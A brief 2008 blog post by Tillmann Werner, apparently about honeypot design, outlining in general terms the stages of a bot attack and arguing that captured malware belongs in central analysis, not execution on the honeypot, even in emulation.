No more emulation!
27 Aug 2008 Tillmann Werner
Emulation is an important technology in honeypots and honeynets. It’s not always what we want, though, and here’s why. As you might know, most bots perform attacks in multiple stages, i.e., they
- send some exploit code to the victim that opens a shell,
- connect to that shell or let the shell connect back,
- invoke commands to download the actual malware binary,
- execute the malware.
Catching the exploit and providing a fake shell isn’t too hard, as shown in this post. But we certainly don’t want a malware to get executed on our honeypot, not even in an emulated environment. Instead, we want to do different things with it, e.g., submit it to a central service for automated analysis.